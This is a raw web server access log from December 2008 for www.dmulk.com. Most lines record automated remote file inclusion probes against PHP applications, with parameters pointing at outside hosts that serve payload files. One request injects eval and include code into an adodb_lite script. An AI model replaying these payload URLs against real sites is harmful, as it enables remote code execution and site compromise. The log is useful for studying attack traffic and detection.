66.135.32.79 - - [08/Dec/2008:11:03:43 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.135.32.79 - - [08/Dec/2008:11:03:43 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:03:52 -0800] "GET /logs/access_080408.log/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:04:03 -0800] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:04:03 -0800] "GET /logs/access_080513.log/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:04:13 -0800] "GET /logs/access_080408.log/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.18.216.110 - - [08/Dec/2008:11:04:49 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.18.216.110 - - [08/Dec/2008:11:04:51 -0800] "GET /logs/access_071214.log///include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.18.216.110 - - [08/Dec/2008:11:04:52 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://v13.siteburg.com/ed.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:05:08 -0800] "GET /logs/access_080521.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:05:09 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:05:09 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.229.126.149 - - [08/Dec/2008:11:05:12 -0800] "GET /logs/access_081027.log//frame.php?framefile=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:05:12 -0800] "GET /logs/access_080601.log//admin/index.php?o=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:05:13 -0800] "GET /logs//admin/index.php?o=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:11:05:28 -0800] "GET /logs/access_081120.log/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:05:39 -0800] "GET /logs/access_080513.log%20%20/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:05:39 -0800] "GET /logs/access_080408.log%20%20/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.176.118 - - [08/Dec/2008:11:05:53 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:06:09 -0800] "GET /logs/access_080123.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:06:11 -0800] "GET /logs/access_080624.log%20%20/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:06:11 -0800] "GET /logs/access_080410.log%20%20/modules/agendax/addevent.inc.php?agendax_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:06:23 -0800] "GET /logs/access_080601.log//components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:06:23 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:06:23 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:06:34 -0800] "GET /logs/access_080117.log//admin/index.php?o=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:07:30 -0800] "GET /logs/access_080601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:07:31 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:11:07:37 -0800] "GET /logs/access_080523.log//components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:11:07:37 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:11:07:37 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:11:07:43 -0800] "GET /logs/access_080522.log//components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:07:55 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:08:00 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:08:00 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:11:08:32 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:11:08:33 -0800] "GET /config/dbutil.bck.php?confdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.153 - - [08/Dec/2008:11:08:53 -0800] "GET /logs/access_080520.log HTTP/1.0" 200 1441792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:09:06 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:09:06 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:09:06 -0800] "GET /logs/index.php?content=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:09:06 -0800] "GET /logs/access_080913.log%20%20/index.php?content=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:09:07 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:09:11 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:09:14 -0800] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.22.110.198 - - [08/Dec/2008:11:09:14 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.198 - - [08/Dec/2008:11:09:14 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.198 - - [08/Dec/2008:11:09:15 -0800] "GET /logs/access_071214.log///include/print_category.php?setup[use_category]=1&dir=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:09:23 -0800] "GET /logs/access_080510.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:09:24 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:09:24 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:11:09:32 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.163.192.68 - - [08/Dec/2008:11:09:32 -0800] "GET /logs/access_081125.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:09:32 -0800] "GET /logs/access_081125.log//snippet.reflect.php?reflect_base=http://h1.ripway.com/Insiderz85/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:09:32 -0800] "GET /logs/access_081125.log//snippet.reflect.php?reflect_base=http://h1.ripway.com/Insiderz85/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:09:33 -0800] "GET /snippet.reflect.php?reflect_base=http://h1.ripway.com/Insiderz85/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:09:33 -0800] "GET /snippet.reflect.php?reflect_base=http://h1.ripway.com/Insiderz85/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:09:52 -0800] "GET /logs/access_081007.log%20%20/index.php?go=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:09:52 -0800] "GET /logs/index.php?go=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:10:31 -0800] "GET /logs/access_080806.log%20%20/index.php?content=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.211.36 - - [08/Dec/2008:11:10:47 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.36 - - [08/Dec/2008:11:10:49 -0800] "GET /logs/access_081105.log HTTP/1.1" 200 1835008 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:10:56 -0800] "GET /snippet.reflect.php?reflect_base=http://h1.ripway.com/Insiderz85/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:11:11:07 -0800] "GET /Neos_Chronos/header.php?base_folder=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.156 - - [08/Dec/2008:11:11:37 -0800] "GET /snippet.reflect.php?reflect_base=http://h1.ripway.com/Insiderz85/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:12:05 -0800] "GET /logs/access_080703.log%20%20/index.php?go=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:12:07 -0800] "GET /logs/access_080506.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:12:08 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:12:08 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.153 - - [08/Dec/2008:11:12:09 -0800] "GET /bikes/dteel/2008_02_07/?M=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:12:14 -0800] "GET /logs/access_080506.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:12:14 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:12:15 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:11:12:47 -0800] "GET /logs/access_081114.log//?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:11:13:11 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:11:13:11 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:11:13:11 -0800] "GET /logs/access_080510.log//templates/mangobery/footer.sample.php?Site_Path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:11:13:12 -0800] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:13:48 -0800] "GET /logs/access_080525.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.228.158.38 - - [08/Dec/2008:11:14:05 -0800] "GET /logs/access_080525.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/kissunix/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.37 - - [08/Dec/2008:11:14:24 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [08/Dec/2008:11:14:26 -0800] "GET /?show=gallery&pageid=159 HTTP/1.1" 200 166028 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:11:14:30 -0800] "GET /logs/show_news.php?cutepath=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:11:14:30 -0800] "GET /show_news.php?cutepath=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.29 - - [08/Dec/2008:11:15:14 -0800] "GET /logs/access_080306.log HTTP/1.1" 200 1787608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:11:15:16 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:11:15:16 -0800] "GET /logs/access_080228.log//Neos_Chronos/header.php?base_folder=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:11:15:16 -0800] "GET /Neos_Chronos/header.php?base_folder=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:11:15:39 -0800] "GET /logs/access_081118.log//?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:11:15:44 -0800] "GET /logs/access_081118.log//?page=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.113.137.169 - - [08/Dec/2008:11:15:55 -0800] "GET /logs/access_080404.log HTTP/1.1" 200 758499 "-" "Opera/9.00 (Windows NT 5.1; U; en)" "www.dmulk.com"
208.64.230.55 - - [08/Dec/2008:11:16:01 -0800] "GET /logs/access_080929.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.55 - - [08/Dec/2008:11:16:01 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.55 - - [08/Dec/2008:11:16:01 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.55 - - [08/Dec/2008:11:16:01 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.55 - - [08/Dec/2008:11:16:01 -0800] "GET /logs/access_081114.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:11:16:25 -0800] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:11:16:27 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 200 95121 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:11:16:27 -0800] "GET /logs/access_081114.log//?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:11:16:27 -0800] "GET /logs/access_081114.log//?page=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:11:16:46 -0800] "GET /logs/access_080525.log//admin.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:11:16:46 -0800] "GET /admin.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:11:16:46 -0800] "GET /logs//admin.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
62.73.172.126 - - [08/Dec/2008:11:16:57 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:11:17:28 -0800] "GET /logs/access_080519.log//administrator/components/com_extcalendar/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:11:17:28 -0800] "GET /administrator/components/com_extcalendar/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:11:17:28 -0800] "GET /logs//administrator/components/com_extcalendar/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.6.22.153 - - [08/Dec/2008:11:17:31 -0800] "GET /logs/access_080404.log HTTP/1.0" 200 758499 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:17:54 -0800] "GET /logs/access_080207.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:17:54 -0800] "GET /logs/access_080727.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:11:17:54 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:11:17:55 -0800] "GET /logs//components/com_extcalendar/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:11:17:55 -0800] "GET /logs/access_080519.log//components/com_extcalendar/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:11:17:55 -0800] "GET /components/com_extcalendar/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:17:56 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:17:56 -0800] "GET /logs/access_080207.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:11:17:56 -0800] "GET /logs/access_080727.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
